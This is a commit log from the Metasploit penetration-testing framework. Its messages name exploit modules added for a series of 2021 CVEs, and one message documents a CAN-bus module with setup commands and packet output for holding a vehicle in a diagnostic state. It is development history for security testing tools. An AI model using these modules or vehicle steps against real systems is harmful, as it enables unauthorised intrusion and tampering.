space-r7 0681c8780e Land #15761, add pie-register code exec 2021-11-02 09:17:50 -05:00
space-r7 8185b26a12 change should to must in referring to id option 2021-11-02 09:15:59 -05:00
Spencer McIntyre 278d940fee Update the Python exploit code to fix a bug 2021-11-02 10:10:18 -04:00
Metasploit 8b82df1479 automatic module_metadata_base.json update 2021-11-02 08:50:14 -05:00
adfoster-r7 79314e6006 Land #15782, Add CVE-2002-0422 Coverage to iis_internal_ip Auxiliary Module 2021-11-02 13:31:34 +00:00
Jake Baines 3aadb6000b Initial version of CVE-2021-22205 GitLab Unauth RCE 2021-11-02 01:46:51 -07:00
Metasploit 31094e9e08 automatic module_metadata_base.json update 2021-11-01 07:53:11 -05:00
adfoster-r7 5a8dbabee9 Land #15809, duplicator add check_plugin line 2021-11-01 12:34:58 +00:00
Gadi Naor 8d7d25ed1b naming - go meterpreter 2021-11-01 09:17:21 +02:00
h00die 46c2d343bd duplicator add check_plugin line 2021-10-29 17:22:12 -04:00
Metasploit b04412132e automatic module_metadata_base.json update 2021-10-29 11:53:01 -05:00
Christophe De La Fuente 43207ebf81 Land #15765, wordpress plugin bulletproofsecurity info disclosure (cve-2021-39327) 2021-10-29 18:33:51 +02:00
Metasploit 0651429350 automatic module_metadata_base.json update 2021-10-29 07:01:51 -05:00
dwelch-r7 73e55fcaee Land #15665, Add Meterpreter compatibility metadata 2021-10-29 12:45:26 +01:00
h00die 25c15dc56c sqlmap in docs 2021-10-28 22:53:32 -04:00
h00die d0335ff2df working module 2021-10-28 22:45:07 -04:00
Spencer McIntyre 98528c8ba6 Fail over to default paths 2021-10-28 15:01:12 -04:00
Metasploit 429e36924a Bump version of framework to 6.1.13 2021-10-28 12:10:01 -05:00
Matthew Dunn becb54d5a5 Update username and password verification to detect improperly set attributes 2021-10-28 12:53:27 -04:00
Metasploit ef7d76b6fb automatic module_metadata_base.json update 2021-10-28 08:17:18 -05:00
Tim W 1b72d5c143 update payload cached sizes 2021-10-28 14:13:59 +01:00
Tim W d2162599bf bump metasploit-payloads to 2.0.60 2021-10-28 14:12:50 +01:00
Spencer McIntyre 1ca9f48266 Land #15783, Add Sophos UTM CVE-2020-25223 exploit 2021-10-28 09:00:08 -04:00
adfoster-r7 1a38441c1a Land #15803, Add f5_bigip_virtual_server Scanner Documentation 2021-10-28 10:12:53 +01:00
William Vu 78ebc89106 Improve sleep timeout using science 2021-10-27 22:49:41 -05:00
Matthew Dunn f074d3a927 Add documentation for f5_bigip_virtual_server scanner module 2021-10-27 23:05:54 -04:00
Metasploit f8b7a66403 automatic module_metadata_base.json update 2021-10-27 20:18:51 -05:00
h00die d076127ca9 pulling values 2021-10-27 21:01:09 -04:00
William Vu 8a7531f890 Land #15800, OMIGOD CVE-2021-38647 exploit 2021-10-27 19:48:57 -05:00
William Vu 2a36287d9d Add more words to module doc 2021-10-27 19:31:03 -05:00
William Vu 76aa872ff5 Add (empty) Options header to module doc
For consistency.
2021-10-27 19:31:03 -05:00
William Vu 3c4bc600f7 Link to open() in perldoc 2021-10-27 19:31:03 -05:00
William Vu c419ca04bd Warn when LPORT isn't 443 2021-10-27 19:31:03 -05:00
William Vu 14421ed5f5 Refactor elapsed time calculation 2021-10-27 19:31:03 -05:00
William Vu 7bbf0305c0 Fix elapsed time calculation using monotonic clock
Hat tip @adfoster-r7.
2021-10-27 19:31:03 -05:00
William Vu 365365bfb0 Add module doc 2021-10-27 19:31:03 -05:00
William Vu 3f9b22dbb7 Add Sophos UTM CVE-2020-25223 exploit 2021-10-27 19:31:03 -05:00
Spencer McIntyre 9635110050 Add documentation for CVE-2021-38648 2021-10-27 12:06:01 -04:00
Spencer McIntyre ae56ffa934 Initial exploit for CVE-2021-38648 2021-10-27 12:05:56 -04:00
Spencer McIntyre 21c45b3733 Update module metadata 2021-10-27 11:58:53 -04:00
dwelch-r7 806f563c67 Land #15799, Fix iis internal ip module crash 2021-10-27 10:32:50 +01:00
Spencer McIntyre 60b17b5c6f Add the module docs for OMIGOD 2021-10-26 12:08:48 -04:00
Spencer McIntyre 33bacd2b20 Update references and add a check method 2021-10-26 10:35:13 -04:00
adfoster-r7 63da82d1f9 Fix iis internal ip module crash 2021-10-26 12:52:26 +01:00
Gadi Naor 75e4d7dab7 remove demo playbook 2021-10-26 08:55:36 +03:00
Spencer McIntyre e9582d1ddb Initial commit for CVE-2021-38647 2021-10-25 17:36:55 -04:00
h00die 7a0295238f Land #15778, docs for http trace scanner 2021-10-25 16:39:35 -04:00
h00die 8b2fed3fda final fixes 2021-10-25 16:38:43 -04:00
Metasploit e620b0f3db automatic module_metadata_base.json update 2021-10-25 12:19:40 -05:00
Christophe De La Fuente 1befd545e3 Land #15558, add module to access a sessions filesystem in a browser 2021-10-25 18:37:42 +02:00
Tim W 86d1e3cb0a fix get_drives format 2021-10-25 17:30:47 +01:00
adfoster-r7 9bafafde21 Land #15788, Remove the AMSI bypass when necessary 2021-10-25 15:46:58 +01:00
Spencer McIntyre 5f1fc2e61b Land #15681, Add SSH reverse port forwarding 2021-10-25 09:30:10 -04:00
Ashley Donaldson 71d7e80529 Extend StreamServer to provide callbacks required by some modules 2021-10-25 12:38:45 +11:00
Ashley Donaldson b9e3f1951d Return immediately once the reverse listener is established 2021-10-25 12:38:45 +11:00
Ashley Donaldson e9386add64 Handle race condition whereby a port forward succeeds after we've exceeded our timeout.
Neatly cleans up the port.
2021-10-25 12:38:45 +11:00
Ashley Donaldson 68a074231e Use logging rather than printing 2021-10-25 12:38:44 +11:00
Ashley Donaldson dba6ce56bc Timeout is cursed - let's remove it 2021-10-25 12:38:44 +11:00
Ashley Donaldson 5a332b511e Fixed rubocop errors 2021-10-25 12:38:44 +11:00
Ashley Donaldson 10421dcc08 Report peer info of connections to SSH reverse port forwards 2021-10-25 12:38:43 +11:00
Ashley Donaldson 99309bab29 Fix reliability issue with SSH reverse listener 2021-10-25 12:38:43 +11:00
Ashley Donaldson fdfecdc8ff Initial work on reverse pivoting through SSH 2021-10-25 12:38:42 +11:00
Metasploit 25b41c9174 automatic module_metadata_base.json update 2021-10-22 22:47:50 -05:00
William Vu 59f83dd79e Land #15790, CVE-2021-42840 module reference fix 2021-10-22 22:14:31 -05:00
wvu 64654a3134 Merge branch 'master' into suitecrm_log_file_rce 2021-10-22 22:11:51 -05:00
M. Cory Billington e90a2a9274 Added CVE 2021-10-22 18:55:37 -05:00
Metasploit c7751289f7 automatic module_metadata_base.json update 2021-10-22 11:59:35 -05:00
Spencer McIntyre 7fc38d1b50 Land #15754, add apache2 path traversal modules 2021-10-22 12:40:57 -04:00
Spencer McIntyre ced61f989b Tweak the verbiage for clarity, update docs 2021-10-22 12:38:03 -04:00
Spencer McIntyre b8f32a1a91 Bump to rex-powershell 0.1.94 2021-10-22 09:50:28 -04:00
Matthew Dunn cbb0e38549 fix code blocks 2021-10-21 20:51:26 -04:00
Matthew Dunn 8128aa5d95 Address PR feedback, add Set up and Nmap sections 2021-10-21 20:45:29 -04:00
h00die 1e9af10a21 pr review 2021-10-21 17:25:14 -04:00
Spencer McIntyre 78d2389cb2 Switch the prepend_protections_bypass
Switch to setting Powershell::prepend_protections_bypass to be
automatically determined by the module. If the generated command is too
large, disable the setting and regenerate the command.
2021-10-21 16:42:04 -04:00
Spencer McIntyre 48a89d7c9a Don't encode the final powershell command
It's unnecessary to encode the final Powershell command in this context
because the modified YSoSerial payload will properly treat the entire
string as the OS command to run.
2021-10-21 16:40:21 -04:00
Metasploit f72db79449 automatic module_metadata_base.json update 2021-10-21 14:24:58 -05:00
Spencer McIntyre 5ac5a14a37 Land #15756, Add PoC for CVE-2021-31806 Squid DoS 2021-10-21 15:07:00 -04:00
RAMELLA Sébastien e449c2456b fix: traversal check logic... 2021-10-21 23:00:39 +04:00
Joshua Rogers f0eb43d99f Update modules/auxiliary/dos/http/squid_range_dos.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-10-21 19:15:30 +02:00
Metasploit c7fd990633 Bump version of framework to 6.1.12 2021-10-21 12:03:56 -05:00
Spencer McIntyre 6d037e508f Land #15773, Add kubernetes testing resources 2021-10-21 11:22:54 -04:00
Matthew Dunn b8672bd9e5 Fix missing info in update_info 2021-10-21 11:09:47 -04:00
Matthew Dunn bb17a20274 Address PR feedback in the module setup/documentation 2021-10-21 11:02:40 -04:00
Metasploit f9e0fc2978 automatic module_metadata_base.json update 2021-10-21 08:33:35 -05:00
adfoster-r7 ff977d34aa Add a make all target 2021-10-21 14:27:16 +01:00
adfoster-r7 ad122e94bd Add patch method for ensuring docker-desktop does not service accounts with full admin access 2021-10-21 14:27:15 +01:00
adfoster-r7 ba68e6baaf Suggest using the Makefile directly 2021-10-21 14:27:15 +01:00
adfoster-r7 5091120a2e Add vulnerable lucee application 2021-10-21 14:27:15 +01:00
adfoster-r7 522bdb592f Add Kubernetes testing resources 2021-10-21 14:27:15 +01:00
Spencer McIntyre 93105f009b Land #15786, Add kubernetes enum module 2021-10-21 09:15:38 -04:00
adfoster-r7 9a50668c5b Fix tunnel info crash when running the sessions command with a websocket based session 2021-10-21 13:06:22 +01:00
Tim W e52083a65c Land #15785, add command name to meterpreter packet inspect 2021-10-21 12:14:17 +01:00
Gadi Naor 065878abf3 Cleanup and leave kubevenom 2021-10-21 13:10:16 +03:00
adfoster-r7 b306641755 Print token claims 2021-10-21 11:05:51 +01:00
Metasploit 446298d27a automatic module_metadata_base.json update 2021-10-21 05:03:51 -05:00
adfoster-r7 f28ced60ee Correctly store extracted loot 2021-10-21 11:02:10 +01:00
adfoster-r7 adbe6070ab PR feedback 2021-10-21 11:02:09 +01:00
adfoster-r7 c0ba4bd619 Add kubernetes enum module 2021-10-21 11:01:25 +01:00
adfoster-r7 2f86b332f5 Land #15733, Add Module For Kubernetes Pod Authenticated Code Execution 2021-10-21 10:46:20 +01:00
Joshua Rogers 2a6f19f0f4 Final lintify 2021-10-21 10:24:00 +02:00
alanfoster ae3efa0589 Add command name to Meterpreter packet inspect 2021-10-21 02:08:39 +01:00
Spencer McIntyre a74730da68 Fix image name enumeration 2021-10-20 17:20:05 -04:00
Metasploit 61644e5af9 automatic module_metadata_base.json update 2021-10-20 15:03:23 -05:00
Spencer McIntyre 1e1b1982b2 Improve image selection when creating a pod
The module will now iterate over identified image names by default and
also allows an explicit image name to be specified using the new
PodImage advanced option.
2021-10-20 15:52:23 -04:00
William Vu fff0e37f64 Land #15784, CVE-2021-22005 exploit docs update 2021-10-20 14:43:40 -05:00
William Vu f270d3ef7a Comment path traversals 2021-10-20 14:16:46 -05:00
Joshua Rogers 095c02d363 Include CVE-2021-31807 proof-of-concept. Also remove excessive HTTP
headers where possible.
2021-10-20 21:01:48 +02:00
Joshua Rogers b03c6aca0b Merge pull request #1 from smcintyre-r7/pr/collab/15756
Use Metasploit's HTTP server to trigger the DoS
2021-10-20 15:38:20 +02:00
Gadi Naor d4291c6548 - Added kubevenom - msf payload for kubernetes
- customize run permissions
2021-10-20 11:21:31 +03:00
Spencer McIntyre 94fd173e8e Update module docs, report the vuln 2021-10-19 16:40:24 -04:00
Spencer McIntyre 0213efe588 Use Metasploit's HTTP server to trigger the DoS 2021-10-19 15:06:02 -04:00
Matthew Dunn d42e119b8f Minor updates 2021-10-19 12:14:01 -04:00
Matthew Dunn efcab13785 Add PROPFIND internal ip discovering, fix module, rubocop module, update documentation 2021-10-19 11:56:36 -04:00
Jeffrey Martin 391c00afbb Land #15781, gemspec should match lock file 2021-10-19 10:49:38 -05:00
Jeffrey Martin 4f5f91de3c gemspec should match lock file mettle version 2021-10-19 10:18:06 -05:00
Matthew Dunn b5ea7efdf7 Add updated error message 2021-10-19 08:22:47 -04:00
Matthew Dunn faa33ab238 Add nil check on the vuln in case the vuln fails to get added to the database 2021-10-19 07:03:13 -04:00
Matthew Dunn f674368a55 Update verification steps 2021-10-19 06:48:32 -04:00
adfoster-r7 e417a36fed Land #15760, Honor json extension in store loot 2021-10-19 11:39:10 +01:00
Matthew Dunn 0dcda6c9f5 Add Cross-Site-Tracing Scanner documentation 2021-10-19 06:29:42 -04:00
Metasploit 211a64cf91 automatic module_metadata_base.json update 2021-10-18 18:10:01 -05:00
adfoster-r7 3f64406255 Land #15732, Add flag for running command in pty 2021-10-18 23:52:10 +01:00
dwelch-r7 f2292c4b5c update payload cache sizes 2021-10-18 17:33:32 +01:00
Metasploit 47179806d7 automatic module_metadata_base.json update 2021-10-18 09:52:26 -05:00
William Vu 53fba0b338 Land #15769, Windows support for CVE-2021-26084 2021-10-18 09:30:43 -05:00
dwelch-r7 6ae0a7f423 Bump mettle version 2021-10-18 14:34:54 +01:00
dwelch-r7 2c8ef87649 Add flag for running command in pty 2021-10-18 14:31:30 +01:00
h00die 5235f69e7e update wp_automatic docs 2021-10-17 15:38:38 -04:00
h00die 165acca028 wp_automatic_plugin 2021-10-17 13:04:38 -04:00
William Vu 83500a17d4 Update vmware_vcenter_analytics_file_upload 2021-10-14 16:58:04 -05:00
William Vu 3e168149ca Increase AutoVerifySession timeout for PSH shells
The sweet spot is five seconds, which is also the default.
2021-10-14 16:58:04 -05:00
William Vu 42ed1b6eef Add Windows support to CVE-2021-26084 exploit 2021-10-14 16:58:04 -05:00
Metasploit d5cbb26f09 Bump version of framework to 6.1.11 2021-10-14 12:06:52 -05:00
Metasploit 88bec68087 automatic module_metadata_base.json update 2021-10-13 09:47:12 -05:00
Grant Willcox 83e0c5430f Land #15764, Fix Meterpreter spelling mistakes 2021-10-13 09:28:10 -05:00
h00die a96cd7b52b update docs for bulletproof 2021-10-12 18:50:36 -04:00
h00die b29bf9e499 update wp-exploitable-plugins 2021-10-12 18:47:30 -04:00
h00die d390535866 bulletproofsecurity info disclosure 2021-10-12 18:43:41 -04:00
adfoster-r7 9f0804cbfb Fix Meterpreter spelling mistake 2021-10-12 23:40:43 +01:00
Gadi Naor 10b5b56ef8 remove chart app version 2021-10-12 07:45:03 +03:00
Metasploit f23c51b57e automatic module_metadata_base.json update 2021-10-11 17:36:30 -05:00
dwelch-r7 dcb42da269 Land #15612, Add multiple moodle modules 2021-10-11 23:18:55 +01:00
h00die b970e38edb spell betterer 2021-10-11 16:44:32 -04:00
h00die 59aa525ecb rubocop 2021-10-11 16:23:09 -04:00
Matthew Dunn f94e2cc513 Switch to using RHOST to avoid default RHOSTS resolving to 8 IPs 2021-10-11 16:16:29 -04:00
h00die 441c1966e2 fix IPs 2021-10-11 15:33:07 -04:00
h00die f6a024fc74 update wp-exploitable-plugins 2021-10-11 15:27:49 -04:00
h00die 0745bbe4d8 pie-register on wordpress 2021-10-11 15:25:07 -04:00
adfoster-r7 25834f019b Honor json extension in store loot 2021-10-11 12:01:31 +01:00
RAMELLA Sébastien 60b2b0f009 update modules and docs 2021-10-10 17:01:15 +04:00
surya a3dcd46acc Removed Unwanted files 2021-10-08 17:33:35 +05:30
RAMELLA Sébastien 256b4edf78 update modules to CVE-2021-42013 2021-10-08 15:22:47 +04:00
surya 2f00ccfbc8 Linted Stuff 2021-10-08 03:04:34 +05:30
surya 59ffc44dbc Cleared a minor error 2021-10-08 02:57:13 +05:30
surya d1e3a104db Merged branches 2021-10-08 02:55:39 +05:30
surya 4d4b51d158 => Added .gitignore
=> Added Deobfuscated HTML Payload
=> Removed Extra Author Credits
=> Made SRVHOST AND SRVPORT MANDATORY
=> generate_uri replaced with builtin get_uri
2021-10-08 02:50:27 +05:30
RAMELLA Sébastien 5fcc268c78 merge work from @RootUp PR 2021-10-07 23:36:17 +04:00
Grant Willcox 8b9b1092f6 Land #15706, Display TCP forwarding information for sessions and jobs for reverse shells 2021-10-07 13:23:06 -05:00
Grant Willcox cf479725b2 Add in string option for ReverseListenerComm to reverse_udp.rb so we don't encounter errors when calling select_com in lib/msf/core/handler/reverse/comm.rb 2021-10-07 12:07:24 -05:00
Metasploit 4440af5365 Bump version of framework to 6.1.10 2021-10-07 12:05:24 -05:00
Joshua Rogers c58dd6bfd1 Use HttpClient in place of sockets. Lintify. 2021-10-07 19:04:46 +02:00
Matthew Dunn ec88c088d1 Fix some of the requested changes 2021-10-07 11:14:46 -04:00
Matthew Dunn e32d112c8f Rewrite module in ruby 2021-10-07 10:33:05 -04:00
Joshua Rogers eb10f2ac1f Fix typo in ruby script. Add documentation .md file. 2021-10-07 14:01:00 +02:00
Joshua Rogers 1db96ad985 Add notes. 2021-10-07 13:57:11 +02:00
Joshua Rogers fd4efdc494 Fix file extension for documentation. 2021-10-07 13:46:10 +02:00
Joshua Rogers 1dccd9dea2 Update documentation/modules/auxiliary/dos/http/squid_range_dos.rb
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2021-10-07 13:45:27 +02:00
Joshua Rogers 756553142f Update documentation/modules/auxiliary/dos/http/squid_range_dos.rb
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2021-10-07 13:45:16 +02:00
Joshua Rogers 7ab6498b8d Update documentation/modules/auxiliary/dos/http/squid_range_dos.rb
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2021-10-07 13:45:08 +02:00
Joshua Rogers fac5f0c987 Add PoC for CVE-2021-31806 Squid DoS Attack 2021-10-07 13:29:56 +02:00
Gadi Naor 108aa0158e - readme update
- change default rbac permissions
2021-10-07 14:05:19 +03:00
Gadi Naor 9cc55ac1b3 - cleanup 2021-10-07 13:56:06 +03:00
Gadi Naor 9088aec122 - remove chart test pod
- readme update
2021-10-07 13:52:43 +03:00
Gadi Naor 1d31540e93 - switch to Bitnami postgresql repo
- Remove chart dependency
- Update readme
- Added configuration options to control various run priviliges
2021-10-07 13:27:12 +03:00
Gadi Naor 443fcb21c4 remove chart deps 2021-10-07 11:51:01 +03:00
Metasploit f19a445c91 automatic module_metadata_base.json update 2021-10-06 17:12:52 -05:00
Spencer McIntyre 7f8d4e834b Land #15747, Add exploit for CVE-2021-22005 2021-10-06 17:54:48 -04:00
William Vu 78ba617aef Add module doc 2021-10-06 16:43:57 -05:00
William Vu 262b5e09f0 Add VMware vCenter Server CVE-2021-22005 exploit 2021-10-06 16:43:57 -05:00
RAMELLA Sébastien 15f25095c5 add notes 2021-10-07 00:04:28 +04:00
RAMELLA Sébastien 275d6dd17b fighting with rubocop 2021-10-06 23:54:08 +04:00
RAMELLA Sébastien 92a0f9034d add modules docs 2021-10-06 23:51:31 +04:00
Matthew Dunn 43d9e311e7 update documentation 2021-10-06 13:56:08 -04:00
Matthew Dunn 9a58750969 Update some references 2021-10-06 13:48:26 -04:00
Metasploit efc2267ce0 automatic module_metadata_base.json update 2021-10-06 12:40:40 -05:00
Matthew Dunn 1d0c8cdc0c Add Azure AD Login Module 2021-10-06 13:34:46 -04:00
adfoster-r7 ba1790c9d2 Land #15750, Ruby 3 windows color support 2021-10-06 18:19:58 +01:00
RAMELLA Sébastien 89515736d4 add. apache CVE-2021-41773 RCE 2021-10-06 21:00:59 +04:00
bwatters ff2a65976e Land #15698, Add PoC for CVE-2021-22555 Netfilter Priv Escalation
Merge branch 'land-15698' into upstream-master
2021-10-06 12:00:32 -05:00
Grant Willcox 39ccb369a2 Land #15745, Fix bug where refs are not checked if the notes section is before refs 2021-10-06 11:23:21 -05:00
Jeffrey Martin ba5a6075e7 ruby 3 windows color support
Ruby 3.0 removes the Win32API namespace from the standard
included libraries.  This new gem exposes the namespace for backwards
compatibility.
2021-10-06 09:44:13 -05:00
adfoster-r7 28eab4d871 Add Meterpreter compatibility metadata 2021-10-06 13:54:51 +01:00
Gadi Naor 1b7f8fc0bf added readme 2021-10-06 14:31:14 +03:00
Gadi Naor 420023f7ff Run metasploit in Kubernetes
Helm installation package
2021-10-06 13:23:01 +03:00
bwatters 1624e2c024 Fix bug where refs are not checked if the notes section is before refs 2021-10-05 14:44:40 -05:00
suryasaradhi cbbb83073f Added Authors 2021-10-05 21:03:45 +05:30
suryasaradhi 5c8d30b24c Delete .gitignore 2021-10-05 20:41:34 +05:30
Metasploit b11237fea0 automatic module_metadata_base.json update 2021-10-05 04:43:41 -05:00
adfoster-r7 9884634d0b Land #15744, update description, refs, and rubocop on tomcat_jsp_upload_bypass 2021-10-05 10:25:47 +01:00
h00die d9d3204e1c update description, ref, rubocop 2021-10-04 22:14:51 -04:00
Metasploit 836bede0e1 automatic module_metadata_base.json update 2021-10-04 16:05:33 -05:00
surya 48388133dd Msftidy up code v2 2021-10-05 02:33:36 +05:30
Grant Willcox f93e1a2488 Land #15730, Update Gitea Git hooks RCE check method 2021-10-04 15:47:04 -05:00
surya 171f114ce2 Msftidy up code v1 2021-10-05 02:10:33 +05:30
surya 3461c7aef6 Added module for CVE-2021-40444 2021-10-05 01:44:34 +05:30
Metasploit 0acef2285d automatic module_metadata_base.json update 2021-10-04 12:08:09 -05:00
adfoster-r7 50ad2f13e1 Land #15739, Add Diagnostic State Module for hwbridge 2021-10-04 17:49:24 +01:00
sjanusz 2c7aa022d4 Add PoC for CVE-2021-22555 Netfilter Priv Escalation 2021-10-04 16:48:23 +01:00
Ashley Donaldson 5196071c22 Keep other instances of via_string to the same convention 2021-10-04 23:51:57 +11:00
Ashley Donaldson 71aab90b53 Added TCP pivot details for reverse_tcp_double handlers 2021-10-04 23:07:15 +11:00
Ashley Donaldson c9499fc70c Show TCP forwarding information for UDP jobs and shells 2021-10-04 22:43:12 +11:00
Ashley Donaldson 0df82e9a21 HTTP payload listeners support ReverseListenerComm param, and display of the session it transits over 2021-10-04 20:27:06 +11:00
Grant Willcox 6541b85449 Land #15735, Update call to deprecated connection_config 2021-10-03 21:02:31 -05:00
Grant Willcox 2881adff04 Land #15737, Fix action handling for auxiliary modules 2021-10-03 20:31:10 -05:00
Jay Turla 613d26743a Update diagnostic_state.rb 2021-10-04 07:31:06 +08:00
Jay Turla f5edbffb74 Update diagnostic_state.md 2021-10-04 07:30:45 +08:00
Grant Willcox ce86cc9c2d Land PR #15738, Add tab completion for action commands 2021-10-03 17:45:30 -05:00
Metasploit 695d1a7e61 automatic module_metadata_base.json update 2021-10-03 16:57:31 -05:00
Grant Willcox ef4bae288e Land #15740, ghostcat meta updates 2021-10-03 16:39:14 -05:00
h00die 43d77d63ce ghostcat meta updates 2021-10-03 16:30:12 -04:00
h00die f49d817ac4 working on cd 2021-10-03 16:13:38 -04:00
Jay Turla 3e3cbb5c4e Update diagnostic_state.md 2021-10-04 01:38:15 +08:00
Jay Turla 8bdbf99c80 Add Diagnostic State Module
## Introduction
This module will keep the vehicle in a diagnostic state on rounds by sending tester present packet.

## Verification Steps

Fire up virtual CAN bus:

1. `sudo modprobe can`
2. `sudo modprobe vcan`
3. `sudo ip link add dev vcan0 type vcan`
4. `sudo ip link set up vcan0`

Launch msf:

5. Start `msfconsole`
6. `use auxiliary/server/local_hwbridge`
7. `set uripath testbus`
8. `run`
9. `use auxiliary/client/hwbridge/connect`
10. `set targeturi testbus`

## Options

```
Module options (post/hardware/automotive/diagnostic_state):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   ARBID    0x7DF            no        CAN ID to perform ECU Hard Reset
   CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
   ROUNDS   500              yes       Number of executed rounds
   SESSION                   yes       The session to run this module on.
```

## Scenarios
You can test this module doing a candump and you should receive a response for each can frame in a loop at 0x7E8 when running UDS Simulator.

```
msf5 auxiliary(client/hwbridge/connect) > run
[*] Running module against 127.0.0.1

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2019-09-11 04:59:40 -0700
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf5 auxiliary(client/hwbridge/connect) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf5 auxiliary(client/hwbridge/connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge > run post/hardware/automotive/diagnostic_state canbus=vcan0

[*] Putting the vehicle in a diagnostic state...
[*] In order to keep the vehicle in this state, you need to continuously send a packet to let the vehicle know that a diagnostic technician is present.
hwbridge >
```

You can use candump to verify the CAN messages being sent:

```
─$ candump vcan0
└─$ candump vcan0
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E
  vcan0  7E8   [4]  03 7E 00 00
  vcan0  7DF   [2]  01 3E

-- snippet --
```

UDS Server Output
```
└─$ ./uds-server -v -V "PWN3D" vcan0
Using CAN interface vcan0
Fuzz level set to: 0
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E
Pkt: 7DF#01 3E

-- snippet --
```
2021-10-04 01:35:31 +08:00
adfoster-r7 c19e4ad43c Fix tab completion for action commands 2021-10-03 02:45:15 +01:00
adfoster-r7 84be79fa12 Fix action handling for auxiliary modules 2021-10-02 19:47:47 +01:00
jaydesl 6d2d680b5b fix: update call to deprecated connection_config 2021-10-02 09:22:37 +01:00
Ashley Donaldson ef8628f1ad Avoid modifying payload_uri, which may be used elsewhere 2021-10-02 14:57:26 +10:00
Metasploit c4639fa626 automatic module_metadata_base.json update 2021-10-01 17:30:26 -05:00
Spencer McIntyre 845ea16e5f Land #15729, Add nil check for return value 2021-10-01 18:11:51 -04:00
Spencer McIntyre d8f2b18649 Implement review feedback 2021-10-01 14:44:13 -04:00
Spencer McIntyre 8d82bebc3c Add the kubernetes/exec module docs 2021-10-01 10:32:12 -04:00
Spencer McIntyre 32540247cb Move the Kubernetes client into a library file 2021-10-01 10:32:12 -04:00
Spencer McIntyre d135e7677b Fix a couple of bugs in the k8s/exec module 2021-10-01 10:32:12 -04:00
Spencer McIntyre 250e40762d Add the ability to create a new pod 2021-10-01 10:32:06 -04:00
adfoster-r7 b6c40a893b Updated Using Metasploit (markdown) 2021-10-01 10:11:15 +01:00
adfoster-r7 a7aa255389 Update gitea git hooks rce check method 2021-10-01 01:11:11 +01:00
kalba-security c1c71d34fe add nil check for the return value of add_printer_driver_ex, since this will return nil if the response can't be mapped to a win32 status code 2021-09-30 19:28:00 -04:00
Spencer McIntyre 7e62ab92ce Allow configuration via an established session 2021-09-30 16:54:01 -04:00
Spencer McIntyre e04882689a Support an explicit HTTP comm 2021-09-30 16:54:01 -04:00
Spencer McIntyre f21216011d Allow RHOSTS and SESSION to be optional 2021-09-30 16:54:01 -04:00
Spencer McIntyre ea6761a3fa Module cleanup and error handling 2021-09-30 16:54:01 -04:00
Spencer McIntyre eb1507660f Add support for direct websocket sessions 2021-09-30 16:54:01 -04:00
Spencer McIntyre 7536db1702 Add an initial kubernetes exec module 2021-09-30 16:54:01 -04:00
Spencer McIntyre 099b47b6d5 Synchronize the WebSocket interface 2021-09-30 16:53:24 -04:00
Spencer McIntyre 556703b181 Pass opts forward through the ws functions 2021-09-30 16:06:49 -04:00
Metasploit efd0467614 Bump version of framework to 6.1.9 2021-09-30 12:05:21 -05:00
bwatters 9dbb89119a Land #15726, Add MeterpreterTryToFork to the mettle payloads
Merge branch 'land-15726' into upstream-master
2021-09-30 11:56:48 -05:00
Spencer McIntyre c53e223852 Add MeterpreterTryToFork to the mettle payloads 2021-09-30 10:07:43 -04:00
Spencer McIntyre 55edd86810 Synchronize access when reading WebSocket frames 2021-09-29 17:55:05 -04:00
Spencer McIntyre 1aa4bc4f66 Raise exceptions WebSocket connection failure 2021-09-29 17:55:05 -04:00
